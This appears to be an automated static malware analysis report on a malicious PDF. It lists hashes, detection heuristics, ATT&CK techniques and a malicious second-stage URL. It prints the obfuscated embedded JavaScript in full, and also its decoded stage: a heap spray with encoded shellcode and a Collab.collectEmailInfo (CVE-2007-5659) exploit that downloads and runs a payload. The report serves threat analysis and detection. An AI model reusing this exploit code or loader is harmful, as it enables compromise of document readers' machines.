Malicious PDF — malware analysis report

Static analysis result for SHA-256 a10d165cad5f798f…

MALICIOUS

PDF

4.7 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 71df8b2ec589212f515c837d09d6203d SHA-1: 83d3f4c0c9226a00f19fae8b5739bb8608618464 SHA-256: a10d165cad5f798fa9cf212e806b4b5aeaa9e77501c740b65b71ebb7c596a27b
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.007 JavaScript

The PDF document contains embedded JavaScript, as indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A PDF_EVAL heuristic also fired, which suggests the JavaScript is obfuscated and likely intended to execute malicious code. The extracted artifact 'javascript_obj0013_001.js' further confirms the presence of script content. The exact intent of the script cannot be determined due to the obfuscation, but it is likely designed to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(); it is one of a series of Acrobat JavaScript API exploits. This call was identified after JavaScript deobfuscation.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript on its own remains low-severity, but this correlated cluster is a high-confidence indicator of malicious behavior.
    Matched line in script
    function H3vPXe(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function juvmVVq(iGFA3ctlsRjG){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(iGFA3ctlsRjG)"+";"+"}");eval("function ue8BksHETEZR7M(mUAXWYhP){var tX5IGdEJ="+"0,ALhdmX=mUAXWYhP.l"+"en"+"gth,cB9vv2D0VSjw=10"+"2"+"4,UqqZ1,MZ6VJ,q2seYtOj3Ke4Y='',p1XVYdLPCM=tX5IGdEJ,AvtoF8fH=tX5IGdEJ,zptiZv4E=tX5IGdEJ,o3Yba50DQZQ=Ar"+"ra"+"y(63,33,36,31,12,52,23,45,24 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored either as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and retrieves it with a urlmon/URLDownloadToFile-style download-and-execute routine (commodity downloader behavior rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://google-moogle.net/fiesta/load.php?id=30417&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x364 6559 bytes
SHA-256: 50c6061379d154f78598a64e44af481e5ba0688b2ef8cdb0180af6659a9cea73
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function H3vPXe(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function juvmVVq(iGFA3ctlsRjG){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(iGFA3ctlsRjG)"+";"+"}");eval("function ue8BksHETEZR7M(mUAXWYhP){var tX5IGdEJ="+"0,ALhdmX=mUAXWYhP.l"+"en"+"gth,cB9vv2D0VSjw=10"+"2"+"4,UqqZ1,MZ6VJ,q2seYtOj3Ke4Y='',p1XVYdLPCM=tX5IGdEJ,AvtoF8fH=tX5IGdEJ,zptiZv4E=tX5IGdEJ,o3Yba50DQZQ=Ar"+"ra"+"y(63,33,36,31,12,52,23,45,24,8,0,0,0,0,0,0,22,46,42,59,26,39,10,62,57,60,13,1,29,58,38,32,41,43,44,34,40,3,15,4,55,14,7,0,0,0,0,49,0,51,61,0,9,5,17,47,6,2,28,27,21,54,53,35,11,20,19,18,48,25,37,50,56,16,30);f"+"o"+"r(MZ6VJ=M"+"at"+"h.c"+"ei"+"l(ALhdmX/"+"cB9vv2D0VSjw)"+";MZ6VJ>tX5IGdEJ;MZ6VJ-"+"-){fo"+"r(UqqZ1=Ma"+"th.m"+"in(ALhdmX,cB9vv2D0VSjw);UqqZ1>tX5IGdEJ;UqqZ1-"+"-,ALhdmX-"+"-){zptiZv4E|"+"=(o3Yba50DQZQ[mUAXWYhP.cha"+"rCod"+"eAt(p1XVYdLPCM+"+"+)-48])<"+"<AvtoF8fH;if(AvtoF8fH){q2seYtOj3Ke4Y+"+"=juvmVVq"+"(97^zptiZv4E&"+"2"+"5"+"5);zptiZv4E>"+">="+"8;AvtoF8fH-"+"="+"2;}el"+"se{AvtoF8fH="+"6"+";}}"+"}return (q2seYtOj3Ke4Y);}var 
MjiGXyOD=implode('',['KLKcr','WqF','rJrJT','jecYWW6KbcK@','WW9r4','K','c8','2WsD','e','5KqIOc','lOO','UVW','54wTwW','Utc','Ul','xi','Fp8wY622Wu8w','9Xy1FrjfUBysrKHO','qk','c_JB2y@@fUqX','tO','i9e2','hKufi95','cKK','v','2Wu8w','9Xy1FrjfUBywr','JytUhqf','ip','Jl','6Y9nhy','j','o','Fd2vl5c','nJ4T','csD9','f','h','N','4w','JqTwW6','5OF2W2','sj','e2Wu8','w9','Xy1FrjfUByS@jW2Wu8w9X','y1Fr','j','fUBy','syje2Wu8w9Xy','1F','rjf','UBywrsy','_csq_W9IOK','delrY9nhyjoFd','2vl5c','n','J4TOrr12@','K','JKK','ly','_WVW2','Wu8w','9Xy1Fr','j','fUByS@K_fyZy_','UiqK','iYIyy','AjO','lul','cpQWls9e2hKLKcrW5hrds4RcadTqa','d8eW6KelhfdyqiW','v','cfd','O@KLKcrW','WYy8vKB8','n9@KfhK_lyqIcKs9ccfy','y','sUfWeldll','sfWe','ld','ll','sfW','el','dll','sfWefLidoyWes','deloyWe6Lv98f','Weu','en98fWeue','lqyfWe2','j','S','qsfW','e','24llsf','We24wdOyWe22lqqfWe','EjidSy','We','Ejwd','EyWeuJSl','EyWevj','sl2yWe2jidEyWe6ledEyW','e29','e9E','yWe8Lwll','f','We','lJn','ds','f','We8','Lwl','lf','We6fid@f','We2','jsqs','fWe2jid','o','y','W','e6ledEyWeoOl','qsfWe6Kl@','@fWe2c','e','9yfWefulqs','fW','e2jiq','yf','W','e2jidEyWeOc','wl6fWeoOedoy','We@ul@@fWe6feqyfW','efue','dyf','We2','ji','qEyWe2j','idE','yWe','Oc','wl','6fWeoOed@','fWeScs@@fWey','eelEy','WefunqvyW','e2jsqv','yW','e2jidEyWe','Oc','wl6fWe','oOed','sfWefel','@@fWef','L','wq','yfWef','u','l@EyWe2jSqoyWe2j','idEyWeO','cwl6fWeoO','ndEyWe','rfs@@fW','efKi@6fWe','f','u','el@fWe2jwq','8fWe2j','idEyWeOcwl6fWeOjwdoyWev8n','lEyW','e8KwqSyW','e6','Leq','qfWeE8e9OyWe22lq6fWe2jid2yW','e','ocedE','y','We8Kwl6fWe','6lv9','oyWe24i','9','OyWe','2','ys@qfWe6','ln96fW','eE8','n','9Oy','Wef','un98','fWe2jwllfWe2jidEyWe','uun','9','EyWeEyld8fWe8L','S9f','fWe','@','vlq@fW','e2ji','dEyWe6Led','EyWeE','9','e9OyWe','rKw','ll','fWerL','wlSyW','e','6L','n9EyWeSji9OyWeyel@@','fWe2','jidEyWeojidEyWeOcwll','fWeufnd','oyW','e','oje','dv','yWeocw','llfWefund@fWe2js@2yWe2jidEyWeOcidSyWer','vv9Ey','W','eo9ed','EyW','eSc','e@','yf','Wer','vl@Oy','We2','4i9EyWeuKi','@@','fWe2jidEy',
'We8KiqffWe6l','v9EyWe29e','9','OyWe2ys@qf','We6ln96','fWeE8n9O','yW','e','Ojsq','@fWe','2jidEyWeu','fedEyW','eo8e','dufWeOc','i','dSy','Wev9S9o','yWeo9Sq','l','fWeye','n9SyWeSj','i@OyWe','o9','w9EyWeO','cwllfWeufnds','f','W','eoj','edOyWeocwll','fWef','und@fWe2jS','9SyW','e2jidEyW','e2js@qfW','e8K','iqf','fWe6lv','9EyWe','28e9','OyWe2qs@','qfWe6ln9','6fWe','E8n9OyWeEjsq@fWe2jidEyW','eu','fedEyWe','6leqffWeE','ji9','OyWe2','ys@qf','We6ln96fW','e','E8n9OyWe2j','sq','@fWe2jid','Ey','WeO','yidEyWeoqw9lfWe','ffidSyWe','ffidSyWeffidSy','Wef','fidSyWefdnlSy','Weoy','edoyWe6ln9SyWeflSqq','fWe','oqiqufWefL','iqff','W','e6ln9OyWe6l','lqsf','We28e@rfWeo','4nll','fWeoOeds','fWe8d','wl','lfWe6lld','sfW','e','E','ce@oyWe29i','@@fWeo','Oe','qSyW','e81nllfW','e','29S9EyWev','9iqSyWeOjnq6','fW','e','lJe92yW','er','didSyW','ev9w98fWe2We','q','8fWeEjilyfWeylsdqfWe28e@oyWerKnq2yWe29idrfWeOjiqvyWeyfs','ql','fWeyKldlfWe8K','w','9yf','WeoylqOyWefln','llf','We','oynllfWe29S','9oyWeu1vqrfWe','29','n','llf','W','e6','l','e9lfWeE9n9qfWesJedSyWe','2','4w','llfWe','29w','llfWeocnqOy','Werl','w9r','f','We2jid@fWeyJsq@fWeyeeq','yf','Weoci','qffWeO9n9vy','WeOWe9','rfWe2ji9yfW','e','@lnlufWe@ev','llf','Wer','LSqOyWe6','unqE','yWe','6L','wlEy','We6dwl@fWe','rlwl','qfW','e6LwlvyWe6','un','lE','yWe6','fn','lSyW','e6fwq2yWe@lnlqfW','e6Ln','qE','yWe6fnl','8fW','e@lvl','sf','WerL','wlyfWe6L','wlS','yW','e6ln','lyfWe','@','enq2yWe@enl','ufWe','61','vq','Ey','W','e','slwllf','We','sevq','sfWes','Kvqlf','WerLvq@fW','e@ev','lsfWeslwlSyWefevqlJWsDe5','ec4fykjOFS21U','a8n','Urufed2sy','jeqquqlqfe','lqfPly6ct','WKf1pycKWRy_','4XTspV9','ly','jeWYy','8vKB','8n9@KfhVnc','KV8yedW5sKJv@','K','L','KcrW2Us7KWXTs','iuueJyLUUFWW6K7_KB9shY4olV4vel2yFK','_','qydf1py','cKWRy_4','X','TspV9','vsfv','1qu12@','KLKcrW2W','u8w9Xy1Fr','jfUBysyjeWeVyOW','icyWW25','yWfK@f1lq','WfK','@f1lqU12@Kdf','hN4w','JqTwW65O','F2','W','W','6','KJo','4B4','_c4','t','yeAO','wi','NR','aeddfhN4','wJ','qTwW65OF25','qyY9nhyjoF','d2vl5cnJ4','T','csD
e5ec4fyVjKWV','8slK_lyd7_','qSWU','ptj','iFnji@K','_qy','fvflfel','qfeesY7_KB9shY4','olV4vel','2y','FDe5KY4fydL','KcrWW','e','lKyqtyKFd2aF','j','e','v@','q','qecfKUeT2yYQ5nU6c_UNqv@q','qe','cfKUeT2yYQT2s9e2hKvw','qaqUF6KOUMy','flcW','e4qOsiHRiVK_l','ys21','do','jU','e','B4','_eJTidKPqyxc1lhTSlo8eWuT','ly','jWWZKLceV9ye9x','tUKK_','Jr41Jd1qyDW','5ec4','fy','xqSlF8','eJU8fpu4K','UK_l','ycWfWVL','KiW8K','KrjUKr9','KiYItrlxO4l4KiV8ys9','Plyx','qSl','F8eJU','8','f','pu','4KUK_lyxqSlF8eJ','U8','fpu4','K','UV','J','KKf5cciyysYnrdYuyrUJW','s','De','5','ec4fyqOv','d','29vpOWW6KbcK@WW9r4Kc8','2','W','Yv8vi@','fac@','5sh','rtt','ri2','ccrcsedee','sJ1rd@POl54Oe72_W','4','I2','c','dct','W','Oqfs','y1qrxqSlF8eJU8fpu4KUV','d','yic4K','9l25q9','12@K1tKKvqsqOvd','29vpO','T','rqIWW6jeq','@KL','5f','KvqsqOvd','2','9vpOTU','qIWW6jeWqKL5f','Kf','K@NySqA','cSYr_r','yLe5q9eqZLWW','e8ui','dsHi9Mc','eVKnly','y','1W','sKnf','ZKv','We8u','id','sHi9MWeVK_e6KulyZLqyq','O','vd','29vpOTUqIW','q','6KKes','Kn','fZKvWe8','uidsHi9','MWeVKnl','y@1WsK','PfyA','jOlul','cp','QW','ls9Ply6c','t','WKJK4@2_J','aWW','6Kf_UW91cc','WKKd','JWfqWvcfdcfqWvcfdty9Ply@2','ciJyysrco','euja','4VncK','V','8','y','edWq6Kll','l8fnq9e','5Wt8fhX4ryF_l','yrcoeuj','a4Deqe','dOOWVdO','UJ5','ccU9reY','4KKK','_lySxyUJ','c','tcVd','OU','J5cKi','qKd4cciJO','wUZxysD9Ke','UR','t@KJ5','yJ_','O','Wh','Rlyrc','oeuja4jO2@K','_fyjWWWX','4','_W','m2','W','sDK']);");eval(ue8BksHETEZR7M(MjiGXyOD));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x364 2665 bytes
SHA-256: 2028e97f9303cfba71d058563c55af618b0757a8a4dc2384d7a7732a3d955455
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var H2RTI6ao = new Array(); function RSKrbmmtOIjGZv(sxGBVuKrvlKE, o3zqVKh87U1Vmk) { while (sxGBVuKrvlKE.length*2<o3zqVKh87U1Vmk){sxGBVuKrvlKE += sxGBVuKrvlKE;} sxGBVuKrvlKE = sxGBVuKrvlKE.substring(0,o3zqVKh87U1Vmk/2); return sxGBVuKrvlKE; } function Of78dMJ0() { var z2CPMQFITF9 = 0x0c0c0c0c; var Yq7gK7B7qx = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u672F%u6F6F%u6C67%u2D65%u6F6D%u676F%u656C%u6E2E%u7465%u662F%u6569%u7473%u2F61%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3033%u3134%u2637%u7073%u3D6C%u0034"); var zfKCxoR7n2wthH = 0x400000; var uOqqqMuRVKLn3 = Yq7gK7B7qx.length * 2; var o3zqVKh87U1Vmk = zfKCxoR7n2wthH - (uOqqqMuRVKLn3+0x38); var sxGBVuKrvlKE = unescape("%u9090%u9090"); sxGBVuKrvlKE = RSKrbmmtOIjGZv(sxGBVuKrvlKE, o3zqVKh87U1Vmk); var nvqnG4 = (z2CPMQFITF9 - 
0x400000)/zfKCxoR7n2wthH; for (var u4a0QuIhXJ=0;u4a0QuIhXJ<nvqnG4;u4a0QuIhXJ++) { H2RTI6ao[u4a0QuIhXJ] = sxGBVuKrvlKE + Yq7gK7B7qx; } } function qVrrW() { var YD7k7UbwLxrm = app.viewerVersion.toString(); YD7k7UbwLxrm = YD7k7UbwLxrm.replace(/\D/g,""); var u9GE3OA = new Array(YD7k7UbwLxrm.charAt(0),YD7k7UbwLxrm.charAt(1),YD7k7UbwLxrm.charAt(2)); if ((u9GE3OA[0] == 8 && ((u9GE3OA[1] == 1 && u9GE3OA[2] < 2) || u9GE3OA[1] < 1)) || (u9GE3OA[0] == 7 && u9GE3OA[1] < 1) || (u9GE3OA[0] < 7)) { Of78dMJ0(); var rQwxVR = unescape("%u0c0c%u0c0c"); while(rQwxVR.length < 44952) rQwxVR += rQwxVR; this.collabStore = Collab.collectEmailInfo({subj: "",msg: rQwxVR}); } } qVrrW();